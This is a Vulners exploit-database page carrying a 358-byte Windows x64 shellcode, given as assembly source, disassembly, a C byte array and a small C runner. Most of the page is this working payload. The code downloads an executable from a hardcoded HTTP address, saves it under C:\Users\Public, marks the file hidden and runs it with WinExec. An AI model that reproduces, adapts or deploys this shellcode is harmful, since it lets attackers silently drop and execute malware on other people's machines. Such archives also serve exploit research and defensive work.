Vulners
Lucene search
Windows x64 - Download & Execute Shellcode (358 bytes)
/*
# Title : Windows x64 Download+Execute Shellcode
# Author : Roziul Hasan Khan Shifat
# Date : 24-11-2016
# size : 358 bytes
# Tested on : Windows 7 x64 Professional
# Email : [email protected]
*/
/*
section .text
global _start
_start:
;-----------------------------
sub rsp,88
lea r14,[rsp]
sub rsp,88
;------------------------------------------------
xor rdx,rdx
mov rax,[gs:rdx+0x60] ;PEB
mov rsi,[rax+0x18] ;PEB.Ldr
mov rsi,[rsi+0x10] ;PEB.Ldr->InMemOrderModuleList
lodsq
mov rsi,[rax]
mov rdi,[rsi+0x30] ;kernel32.dll base address
;---------------------------------------------------
mov ebx,[rdi+0x3c] ;elf_anew
add rbx,rdi
mov dl,0x88
mov ebx,[rbx+rdx]
add rbx,rdi
mov esi,[rbx+0x1c]
add rsi,rdi
;--------------------------------------------------
;loading urlmon.dll
mov dx,831
mov ebx,[rsi+rdx*4]
add rbx,rdi
xor rdx,rdx
mov [r14],dword 'urlm'
mov [r14+4],word 'on'
mov [r14+6],byte dl
lea rcx,[r14]
call rbx
mov dx,586
mov ebx,[rsi+rdx*4]
add rbx,rdi
xor rdx,rdx
mov rcx,'URLDownl'
mov [r14],rcx
mov rcx,'oadToFil'
mov [r14+8],rcx
mov [r14+16],word 'eA'
mov [r14+18],byte dl
lea rdx,[r14]
mov rcx,rax
call rbx
;;;;;;;;;;;;;;;;;;;;;;-------------------------------------
mov r15,rax
;------------------------------------------------
;save as 'C:\\Users\\Public\\p.exe' length: 24+1
mov rax,'C:\\User'
mov [r14],rax
mov rax,'s\\Publi'
mov [r14+8],rax
mov rax,'c\\p.exe'
mov [r14+16],rax
xor rdx,rdx
mov [r14+24],byte dl
;----------------------------------------
lea rcx,[r14+25]
;url "http://192.168.10.129/pl.exe" length: 28+1
mov rax,'http://1'
mov [rcx],rax
mov rax,'92.168.1'
mov [rcx+8],rax
mov rax,'0.129/pl'
mov [rcx+16],rax
mov [rcx+24],dword '.exe'
mov [rcx+28],byte dl
;---------------------------------------------------
sub rsp,88
download:
xor rcx,rcx
lea rdx,[r14+25]
lea r8,[r14]
xor r9,r9
mov [rsp+32],r9
call r15
xor rdx,rdx
cmp rax,rdx
jnz download
;------------------------------------------------
sub rsp,88
;-----------------------------------------------
;hiding file
mov dx,1131
mov ebx,[rsi+rdx*4]
add rbx,rdi ;SetFileAttributesA()
lea rcx,[r14]
xor rdx,rdx
mov dl,2
call rbx
;------------------------------------
;executing file
xor rdx,rdx
mov dx,1314
mov ebx,[rsi+rdx*4]
add rbx,rdi ;WinExec()
lea rcx,[r14]
xor rdx,rdx
call rbx
;------------------------------
xor rdx,rdx
mov dx,296
mov ebx,[rsi+rdx*4]
add rbx,rdi
;---------------------------------------
;if U use this shellcode for pe injection, then don't forget to free allocated space
add rsp,88
xor rcx,rcx
call rbx
*/
/*
Disassembly of section .text:
0000000000000000 <_start>:
0: 48 83 ec 58 sub $0x58,%rsp
4: 4c 8d 34 24 lea (%rsp),%r14
8: 48 83 ec 58 sub $0x58,%rsp
c: 48 31 d2 xor %rdx,%rdx
f: 65 48 8b 42 60 mov %gs:0x60(%rdx),%rax
14: 48 8b 70 18 mov 0x18(%rax),%rsi
18: 48 8b 76 10 mov 0x10(%rsi),%rsi
1c: 48 ad lods %ds:(%rsi),%rax
1e: 48 8b 30 mov (%rax),%rsi
21: 48 8b 7e 30 mov 0x30(%rsi),%rdi
25: 8b 5f 3c mov 0x3c(%rdi),%ebx
28: 48 01 fb add %rdi,%rbx
2b: b2 88 mov $0x88,%dl
2d: 8b 1c 13 mov (%rbx,%rdx,1),%ebx
30: 48 01 fb add %rdi,%rbx
33: 8b 73 1c mov 0x1c(%rbx),%esi
36: 48 01 fe add %rdi,%rsi
39: 66 ba 3f 03 mov $0x33f,%dx
3d: 8b 1c 96 mov (%rsi,%rdx,4),%ebx
40: 48 01 fb add %rdi,%rbx
43: 48 31 d2 xor %rdx,%rdx
46: 41 c7 06 75 72 6c 6d movl $0x6d6c7275,(%r14)
4d: 66 41 c7 46 04 6f 6e movw $0x6e6f,0x4(%r14)
54: 41 88 56 06 mov %dl,0x6(%r14)
58: 49 8d 0e lea (%r14),%rcx
5b: ff d3 callq *%rbx
5d: 66 ba 4a 02 mov $0x24a,%dx
61: 8b 1c 96 mov (%rsi,%rdx,4),%ebx
64: 48 01 fb add %rdi,%rbx
67: 48 31 d2 xor %rdx,%rdx
6a: 48 b9 55 52 4c 44 6f movabs $0x6c6e776f444c5255,%rcx
71: 77 6e 6c
74: 49 89 0e mov %rcx,(%r14)
77: 48 b9 6f 61 64 54 6f movabs $0x6c69466f5464616f,%rcx
7e: 46 69 6c
81: 49 89 4e 08 mov %rcx,0x8(%r14)
85: 66 41 c7 46 10 65 41 movw $0x4165,0x10(%r14)
8c: 41 88 56 12 mov %dl,0x12(%r14)
90: 49 8d 16 lea (%r14),%rdx
93: 48 89 c1 mov %rax,%rcx
96: ff d3 callq *%rbx
98: 49 89 c7 mov %rax,%r15
9b: 48 b8 43 3a 5c 5c 55 movabs $0x726573555c5c3a43,%rax
a2: 73 65 72
a5: 49 89 06 mov %rax,(%r14)
a8: 48 b8 73 5c 5c 50 75 movabs $0x696c6275505c5c73,%rax
af: 62 6c 69
b2: 49 89 46 08 mov %rax,0x8(%r14)
b6: 48 b8 63 5c 5c 70 2e movabs $0x6578652e705c5c63,%rax
bd: 65 78 65
c0: 49 89 46 10 mov %rax,0x10(%r14)
c4: 48 31 d2 xor %rdx,%rdx
c7: 41 88 56 18 mov %dl,0x18(%r14)
cb: 49 8d 4e 19 lea 0x19(%r14),%rcx
cf: 48 b8 68 74 74 70 3a movabs $0x312f2f3a70747468,%rax
d6: 2f 2f 31
d9: 48 89 01 mov %rax,(%rcx)
dc: 48 b8 39 32 2e 31 36 movabs $0x312e3836312e3239,%rax
e3: 38 2e 31
e6: 48 89 41 08 mov %rax,0x8(%rcx)
ea: 48 b8 30 2e 31 32 39 movabs $0x6c702f3932312e30,%rax
f1: 2f 70 6c
f4: 48 89 41 10 mov %rax,0x10(%rcx)
f8: c7 41 18 2e 65 78 65 movl $0x6578652e,0x18(%rcx)
ff: 88 51 1c mov %dl,0x1c(%rcx)
102: 48 83 ec 58 sub $0x58,%rsp
0000000000000106 <download>:
106: 48 31 c9 xor %rcx,%rcx
109: 49 8d 56 19 lea 0x19(%r14),%rdx
10d: 4d 8d 06 lea (%r14),%r8
110: 4d 31 c9 xor %r9,%r9
113: 4c 89 4c 24 20 mov %r9,0x20(%rsp)
118: 41 ff d7 callq *%r15
11b: 48 31 d2 xor %rdx,%rdx
11e: 48 39 d0 cmp %rdx,%rax
121: 75 e3 jne 106 <download>
123: 48 83 ec 58 sub $0x58,%rsp
127: 66 ba 6b 04 mov $0x46b,%dx
12b: 8b 1c 96 mov (%rsi,%rdx,4),%ebx
12e: 48 01 fb add %rdi,%rbx
131: 49 8d 0e lea (%r14),%rcx
134: 48 31 d2 xor %rdx,%rdx
137: b2 02 mov $0x2,%dl
139: ff d3 callq *%rbx
13b: 48 31 d2 xor %rdx,%rdx
13e: 66 ba 22 05 mov $0x522,%dx
142: 8b 1c 96 mov (%rsi,%rdx,4),%ebx
145: 48 01 fb add %rdi,%rbx
148: 49 8d 0e lea (%r14),%rcx
14b: 48 31 d2 xor %rdx,%rdx
14e: ff d3 callq *%rbx
150: 48 31 d2 xor %rdx,%rdx
153: 66 ba 28 01 mov $0x128,%dx
157: 8b 1c 96 mov (%rsi,%rdx,4),%ebx
15a: 48 01 fb add %rdi,%rbx
15d: 48 83 c4 58 add $0x58,%rsp
161: 48 31 c9 xor %rcx,%rcx
164: ff d3 callq *%rbx
*/
#include<windows.h>
#include<stdio.h>
#include<string.h>
char shellcode[]=\
"\x48\x83\xec\x58\x4c\x8d\x34\x24\x48\x83\xec\x58\x48\x31\xd2\x65\x48\x8b\x42\x60\x48\x8b\x70\x18\x48\x8b\x76\x10\x48\xad\x48\x8b\x30\x48\x8b\x7e\x30\x8b\x5f\x3c\x48\x01\xfb\xb2\x88\x8b\x1c\x13\x48\x01\xfb\x8b\x73\x1c\x48\x01\xfe\x66\xba\x3f\x03\x8b\x1c\x96\x48\x01\xfb\x48\x31\xd2\x41\xc7\x06\x75\x72\x6c\x6d\x66\x41\xc7\x46\x04\x6f\x6e\x41\x88\x56\x06\x49\x8d\x0e\xff\xd3\x66\xba\x4a\x02\x8b\x1c\x96\x48\x01\xfb\x48\x31\xd2\x48\xb9\x55\x52\x4c\x44\x6f\x77\x6e\x6c\x49\x89\x0e\x48\xb9\x6f\x61\x64\x54\x6f\x46\x69\x6c\x49\x89\x4e\x08\x66\x41\xc7\x46\x10\x65\x41\x41\x88\x56\x12\x49\x8d\x16\x48\x89\xc1\xff\xd3\x49\x89\xc7\x48\xb8\x43\x3a\x5c\x5c\x55\x73\x65\x72\x49\x89\x06\x48\xb8\x73\x5c\x5c\x50\x75\x62\x6c\x69\x49\x89\x46\x08\x48\xb8\x63\x5c\x5c\x70\x2e\x65\x78\x65\x49\x89\x46\x10\x48\x31\xd2\x41\x88\x56\x18\x49\x8d\x4e\x19\x48\xb8\x68\x74\x74\x70\x3a\x2f\x2f\x31\x48\x89\x01\x48\xb8\x39\x32\x2e\x31\x36\x38\x2e\x31\x48\x89\x41\x08\x48\xb8\x30\x2e\x31\x32\x39\x2f\x70\x6c\x48\x89\x41\x10\xc7\x41\x18\x2e\x65\x78\x65\x88\x51\x1c\x48\x83\xec\x58\x48\x31\xc9\x49\x8d\x56\x19\x4d\x8d\x06\x4d\x31\xc9\x4c\x89\x4c\x24\x20\x41\xff\xd7\x48\x31\xd2\x48\x39\xd0\x75\xe3\x48\x83\xec\x58\x66\xba\x6b\x04\x8b\x1c\x96\x48\x01\xfb\x49\x8d\x0e\x48\x31\xd2\xb2\x02\xff\xd3\x48\x31\xd2\x66\xba\x22\x05\x8b\x1c\x96\x48\x01\xfb\x49\x8d\x0e\x48\x31\xd2\xff\xd3\x48\x31\xd2\x66\xba\x28\x01\x8b\x1c\x96\x48\x01\xfb\x48\x83\xc4\x58\x48\x31\xc9\xff\xd3";
int main()
{
int len=strlen(shellcode);
DWORD l=0;
printf("shellcode length : %d\n",len);
VirtualProtect(shellcode,len,PAGE_EXECUTE_READWRITE,&l);
(* (int(*)()) shellcode)();
return 0;
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
23 Nov 2016 00:00Current